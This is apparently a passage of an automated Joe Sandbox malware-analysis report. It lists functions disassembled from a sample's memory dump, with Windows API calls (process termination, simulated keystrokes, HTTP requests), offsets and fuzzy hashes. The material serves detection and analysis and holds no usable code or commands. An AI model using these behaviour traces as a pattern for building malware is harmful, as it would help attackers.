                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                  • String ID: close all
                                                                  • API String ID: 469580280-3243417748
                                                                  • Opcode ID: bc1ebe71d37313e7fc2cf4cf0318f6d8bf90f357d13aa2d761697a7b7ebb71da
                                                                  • Instruction ID: 54a34bec0acd9813329829c3170e2592de73e1db2c80db00718414ccb604791f
                                                                  • Opcode Fuzzy Hash: bc1ebe71d37313e7fc2cf4cf0318f6d8bf90f357d13aa2d761697a7b7ebb71da
                                                                  • Instruction Fuzzy Hash: 55D17C717016239FCB68EF54D8A5AA9F7A2BF04710F1142ADE54A6B361CB30AD52CF44
                                                                  APIs
                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006989F2
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00698A06
                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00698A30
                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00698A4A
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00698A5C
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00698AA5
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00698AF5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectory$AttributesFile
                                                                  • String ID: *.*
                                                                  • API String ID: 769691225-438819550
                                                                  • Opcode ID: 1d6e6ede6883d984c7b57d8118a48379cdedbb22c78cb1c9baa6ed47242baffe
                                                                  • Instruction ID: f11098a1fdc2539e3eda9ba24507d86f00a16c2b83f6b5e6fb1d0ec9ce811aa2
                                                                  • Opcode Fuzzy Hash: 1d6e6ede6883d984c7b57d8118a48379cdedbb22c78cb1c9baa6ed47242baffe
                                                                  • Instruction Fuzzy Hash: F581AE729043459FCF24EF18C444ABAB3EEBF86310F54482EF889D7651DB35D9458B92
                                                                  APIs
                                                                  • IsWindow.USER32(00000000), ref: 006B8992
                                                                  • IsWindowEnabled.USER32(00000000), ref: 006B899E
                                                                  • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 006B8A79
                                                                  • SendMessageW.USER32(00000000,000000B0,?,?), ref: 006B8AAC
                                                                  • IsDlgButtonChecked.USER32(?,00000000), ref: 006B8AE4
                                                                  • GetWindowLongW.USER32(00000000,000000EC), ref: 006B8B06
                                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 006B8B1E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                  • String ID: (o
                                                                  • API String ID: 4072528602-1684096767
                                                                  • Opcode ID: 78128d2a2756e8e04ba2356734567bed2aed9d86791f29e4db8b2f9851ec9abe
                                                                  • Instruction ID: 28800e8a3bac5778d9e86341e4bde0e1d952ac58004a58dd21b150e4db62e446
                                                                  • Opcode Fuzzy Hash: 78128d2a2756e8e04ba2356734567bed2aed9d86791f29e4db8b2f9851ec9abe
                                                                  • Instruction Fuzzy Hash: AA718BB4600205AFDF21AF68C894FFABBBBEF49300F14045AE95567361DB31A9C1CB51
                                                                  APIs
                                                                  • SetWindowLongW.USER32(?,000000EB), ref: 006274D7
                                                                    • Part of subcall function 00627567: GetClientRect.USER32(?,?), ref: 0062758D
                                                                    • Part of subcall function 00627567: GetWindowRect.USER32(?,?), ref: 006275CE
                                                                    • Part of subcall function 00627567: ScreenToClient.USER32(?,?), ref: 006275F6
                                                                  • GetDC.USER32 ref: 00666083
                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00666096
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 006660A4
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 006660B9
                                                                  • ReleaseDC.USER32(?,00000000), ref: 006660C1
                                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00666152
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                  • String ID: U
                                                                  • API String ID: 4009187628-3372436214
                                                                  • Opcode ID: d2746c85d603d158a771ce6e0e905372b20d9cd7e2b672bdb7a93dd91fd81839
                                                                  • Instruction ID: 5bf55a25cc2415b55b17b7c2d76cf3b07b972ce10195a3b5e0e1d373b6a13fdb
                                                                  • Opcode Fuzzy Hash: d2746c85d603d158a771ce6e0e905372b20d9cd7e2b672bdb7a93dd91fd81839
                                                                  • Instruction Fuzzy Hash: 8D71DF30500205EFCF219F68E984AFABBB7FF4A320F144269FD555A2A6D7319881DF50
                                                                  APIs
                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0069CCB7
                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0069CCDF
                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0069CD0F
                                                                  • GetLastError.KERNEL32 ref: 0069CD67
                                                                  • SetEvent.KERNEL32(?), ref: 0069CD7B
                                                                  • InternetCloseHandle.WININET(00000000), ref: 0069CD86
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                  • String ID:
                                                                  • API String ID: 3113390036-3916222277
                                                                  • Opcode ID: a7850d499be5ee356bc88edba01ee094c2a336c22fcba770ee2f8772bfb19ffe
                                                                  • Instruction ID: f1753b678a4e0ea77a28ee87d71d05503707435a80407df9f0b7aad2f98ed7cc
                                                                  • Opcode Fuzzy Hash: a7850d499be5ee356bc88edba01ee094c2a336c22fcba770ee2f8772bfb19ffe
                                                                  • Instruction Fuzzy Hash: AA319FB1500604AFDB21AF64CC88AAB7BFEEF45750B10452EF446D7601EB34DD48DB61
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,006655AE,?,?,Bad directive syntax error,006BDCD0,00000000,00000010,?,?), ref: 0068A236
                                                                  • LoadStringW.USER32(00000000,?,006655AE,?), ref: 0068A23D
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0068A301
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: HandleLoadMessageModuleString_wcslen
                                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                  • API String ID: 858772685-4153970271
                                                                  • Opcode ID: fa69f3af7135d9181881aaa687c1c929a88a087feff11f2fef582570af3e47ad
                                                                  • Instruction ID: c83533968a523b76bb723ebe443b36da22e3ac9487b5a9159b9dd772ba20abb8
                                                                  • Opcode Fuzzy Hash: fa69f3af7135d9181881aaa687c1c929a88a087feff11f2fef582570af3e47ad
                                                                  • Instruction Fuzzy Hash: FC218F3280021EEBDF12AB90DC16EEE7B7ABF18300F044569B605690A2EB719658DB51
                                                                  APIs
                                                                  • GetParent.USER32 ref: 006829F8
                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00682A0D
                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00682A9A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ClassMessageNameParentSend
                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                  • API String ID: 1290815626-3381328864
                                                                  • Opcode ID: 69f6ef1fd4bb5095521ef22da4759a4ae8e54c915d19265a4d05b94465fa7d9b
                                                                  • Instruction ID: 6a6f1c672c91e366ea42675ef36fabdc186779cdbbf4ffb1fc1f5b92f89921a6
                                                                  • Opcode Fuzzy Hash: 69f6ef1fd4bb5095521ef22da4759a4ae8e54c915d19265a4d05b94465fa7d9b
                                                                  • Instruction Fuzzy Hash: 49112976644707B9F72C7221EC27DE6379F8F15B64B200226F905E50D1FF63A8514B18
                                                                  APIs
                                                                  • GetClientRect.USER32(?,?), ref: 0062758D
                                                                  • GetWindowRect.USER32(?,?), ref: 006275CE
                                                                  • ScreenToClient.USER32(?,?), ref: 006275F6
                                                                  • GetClientRect.USER32(?,?), ref: 0062773A
                                                                  • GetWindowRect.USER32(?,?), ref: 0062775B
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Client$Window$Screen
                                                                  • String ID:
                                                                  • API String ID: 1296646539-0
                                                                  Similarity
                                                                  • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                  • String ID:
                                                                  • API String ID: 1282221369-0
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 006B5C24
                                                                  • ShowWindow.USER32(?,00000000), ref: 006B5C65
                                                                  • ShowWindow.USER32(?,00000005,?,00000000), ref: 006B5C6B
                                                                  • SetFocus.USER32(?,?,00000005,?,00000000), ref: 006B5C6F
                                                                    • Part of subcall function 006B79F2: DeleteObject.GDI32(00000000), ref: 006B7A1E
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 006B5CAB
                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 006B5CB8
                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 006B5CEB
                                                                  • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 006B5D25
                                                                  • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 006B5D34
                                                                  Similarity
                                                                  • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                  • String ID:
                                                                  • API String ID: 3210457359-0
                                                                  APIs
                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0069CBC7
                                                                  • GetLastError.KERNEL32 ref: 0069CBDA
                                                                  • SetEvent.KERNEL32(?), ref: 0069CBEE
                                                                    • Part of subcall function 0069CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0069CCB7
                                                                    • Part of subcall function 0069CC98: GetLastError.KERNEL32 ref: 0069CD67
                                                                    • Part of subcall function 0069CC98: SetEvent.KERNEL32(?), ref: 0069CD7B
                                                                    • Part of subcall function 0069CC98: InternetCloseHandle.WININET(00000000), ref: 0069CD86
                                                                  Similarity
                                                                  • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                  • String ID:
                                                                  • API String ID: 337547030-0
                                                                  APIs
                                                                    • Part of subcall function 00684393: GetWindowThreadProcessId.USER32(?,00000000), ref: 006843AD
                                                                    • Part of subcall function 00684393: GetCurrentThreadId.KERNEL32 ref: 006843B4
                                                                    • Part of subcall function 00684393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00682F00), ref: 006843BB
                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00682F0A
                                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00682F28
                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00682F2C
                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00682F36
                                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00682F4E
                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00682F52
                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00682F5C
                                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00682F70
                                                                  • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00682F74
                                                                  Similarity
                                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                  • String ID:
                                                                  • API String ID: 2014098862-0
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00681D95,?,?,00000000), ref: 00682159
                                                                  • HeapAlloc.KERNEL32(00000000,?,00681D95,?,?,00000000), ref: 00682160
                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00681D95,?,?,00000000), ref: 00682175
                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00681D95,?,?,00000000), ref: 0068217D
                                                                  • DuplicateHandle.KERNEL32(00000000,?,00681D95,?,?,00000000), ref: 00682180
                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00681D95,?,?,00000000), ref: 00682190
                                                                  • GetCurrentProcess.KERNEL32(00681D95,00000000,?,00681D95,?,?,00000000), ref: 00682198
                                                                  • DuplicateHandle.KERNEL32(00000000,?,00681D95,?,?,00000000), ref: 0068219B
                                                                  • CreateThread.KERNEL32(00000000,00000000,006821C1,00000000,00000000,00000000), ref: 006821B5
                                                                  Similarity
                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                  • String ID:
                                                                  • API String ID: 1957940570-0
                                                                  APIs
                                                                    • Part of subcall function 006241EA: _wcslen.LIBCMT ref: 006241EF
                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0068CF99
                                                                  • _wcslen.LIBCMT ref: 0068CFE0
                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0068D047
                                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0068D075
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info_wcslen$Default
                                                                  • String ID: ,*o$0$<*o
                                                                  • API String ID: 1227352736-450841681
                                                                  APIs
                                                                    • Part of subcall function 0068DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 0068DDAC
                                                                    • Part of subcall function 0068DD87: Process32FirstW.KERNEL32(00000000,?), ref: 0068DDBA
                                                                    • Part of subcall function 0068DD87: CloseHandle.KERNEL32(00000000), ref: 0068DE87
                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006AABCA
                                                                  • GetLastError.KERNEL32 ref: 006AABDD
                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006AAC10
                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 006AACC5
                                                                  • GetLastError.KERNEL32(00000000), ref: 006AACD0
                                                                  • CloseHandle.KERNEL32(00000000), ref: 006AAD21
                                                                  Similarity
                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                  • String ID: SeDebugPrivilege
                                                                  • API String ID: 2533919879-2896544425
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 006B43C1
                                                                  • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 006B43D6
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 006B43F0
                                                                  • _wcslen.LIBCMT ref: 006B4435
                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 006B4462
                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 006B4490
                                                                  Similarity
                                                                  • API ID: MessageSend$Window_wcslen
                                                                  • String ID: SysListView32
                                                                  • API String ID: 2147712094-78025650
                                                                  APIs
                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0068C6C4
                                                                  • IsMenu.USER32(00000000), ref: 0068C6E4
                                                                  • CreatePopupMenu.USER32 ref: 0068C71A
                                                                  • GetMenuItemCount.USER32(01536568), ref: 0068C76B
                                                                  • InsertMenuItemW.USER32(01536568,?,00000001,00000030), ref: 0068C793
                                                                  Similarity
                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                  • String ID: 0$2
                                                                  • API String ID: 93392585-3793063076
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 006219E1
                                                                  • ScreenToClient.USER32(00000000,?), ref: 006219FE
                                                                  • GetAsyncKeyState.USER32(00000001), ref: 00621A23
                                                                  • GetAsyncKeyState.USER32(00000002), ref: 00621A3D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                  • String ID: $'b$$'b
                                                                  • API String ID: 4210589936-917026582
                                                                  • Opcode ID: 87912675b182f703cae3b1baa4fd863c65f4741eb1cc59a3ea059c52370463cc
                                                                  • Instruction ID: 9e35a8a2546a25ee2f01b10f8eee049a6527a6d57608e3e5207339d532a4745a
                                                                  • Opcode Fuzzy Hash: 87912675b182f703cae3b1baa4fd863c65f4741eb1cc59a3ea059c52370463cc
                                                                  • Instruction Fuzzy Hash: AA4193B160852AFFDF059F68D844AEDF772FB06324F20821AE429A6390D7305A94CF91
                                                                  APIs
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 006B8740
                                                                  • SetWindowLongW.USER32(00000000,000000F0,?), ref: 006B8765
                                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 006B877D
                                                                  • GetSystemMetrics.USER32(00000004), ref: 006B87A6
                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0069C1F2,00000000), ref: 006B87C6
                                                                    • Part of subcall function 0062249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006224B0
                                                                  • GetSystemMetrics.USER32(00000004), ref: 006B87B1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Long$MetricsSystem
                                                                  • String ID: (o
                                                                  • API String ID: 2294984445-1684096767
                                                                  • Opcode ID: 8547c02f49b4b8634ac1330e42a59f11ee9c016a13a5e9f5a0127b536ee8a594
                                                                  • Instruction ID: af9a2903090741bc871293769ecc8624fca9633cbdf0d4038191024760ffe1d3
                                                                  • Opcode Fuzzy Hash: 8547c02f49b4b8634ac1330e42a59f11ee9c016a13a5e9f5a0127b536ee8a594
                                                                  • Instruction Fuzzy Hash: 2C214FB16102569FCB145F39CC58AAE77ABEB45369F254739B926C72E0EE708890CF10
                                                                  APIs
                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 0068D1BE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: IconLoad
                                                                  • String ID: blank$info$question$stop$warning
                                                                  • API String ID: 2457776203-404129466
                                                                  • Opcode ID: 834e266151c30422ccf0227b3e70ac14732af78ae2c58ebdaa01ba65169b7b0f
                                                                  • Instruction ID: 91d6b13f539197fb22af7bb78d224e6cf3a87a92636ae6c00e3e99b4af1a86c1
                                                                  • Opcode Fuzzy Hash: 834e266151c30422ccf0227b3e70ac14732af78ae2c58ebdaa01ba65169b7b0f
                                                                  • Instruction Fuzzy Hash: 5E11593164D306FAEB046B14DC87EEE37AF9F05760B20023AF940A63C1EBB1AA414774
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                  • String ID: 0.0.0.0
                                                                  • API String ID: 642191829-3771769585
                                                                  • Opcode ID: a9f961ffda5fa0133e0ee789e6aeecd8c862996eeef5ca5e06fd2e15fa8f56c7
                                                                  • Instruction ID: 857e20915fa4503c92f90d7e28a13b7dec7ee5c59565e2ce9fd9d3d1246249cd
                                                                  • Opcode Fuzzy Hash: a9f961ffda5fa0133e0ee789e6aeecd8c862996eeef5ca5e06fd2e15fa8f56c7
                                                                  • Instruction Fuzzy Hash: 5A11E471900115BBCB24B760DC4AEDE37AEDF01710F0002B9F505AA091FFB58A81C754
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$LocalTime
                                                                  • String ID:
                                                                  • API String ID: 952045576-0
                                                                  • Opcode ID: df4cc759375313698fc185f77ca666dd5dec56042341cc040c61af937e51e6e8
